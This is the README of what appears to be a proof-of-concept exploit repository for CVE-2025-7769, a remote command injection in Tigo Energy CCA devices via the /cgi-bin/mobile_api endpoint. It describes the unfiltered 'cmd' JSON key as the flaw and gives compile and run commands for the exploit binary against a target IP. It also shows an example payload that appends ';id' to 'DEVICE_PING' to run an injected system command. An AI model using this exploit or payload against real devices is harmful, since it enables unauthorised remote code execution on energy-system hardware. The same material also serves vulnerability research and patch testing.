
PoC para inyectar un comando a través del endpoint DEVICE_PING
Este repositorio contiene un exploit de Prueba de Concepto (PoC) para CVE‑2025‑7769, una vulnerabilidad crítica de Inyección de Comandos remota encontrada en dispositivos Tigo Energy CCA que exponen el endpoint /cgi-bin/mobile_api.
La vulnerabilidad se desencadena mediante la inyección de comandos del sistema operativo a través de la clave JSON cmd, donde la entrada sin filtrar se concatena directamente en una llamada al sistema, permitiendo la ejecución remota completa de código (RCE) en el dispositivo.
gcc exploit.c argparse.c -o CVE-2025-7769 -lcurl
./CVE-2025-7769 -i 10.0.2.15 -p 80 -v
Replace 10.0.2.15 with the target IP.
Use -u http://target.com if you want to pass a full base URL instead of IP/port.
Example Payload :
{
"cmd": "DEVICE_PING;id",
"dev": 2,
"ver": 1
}
MIT License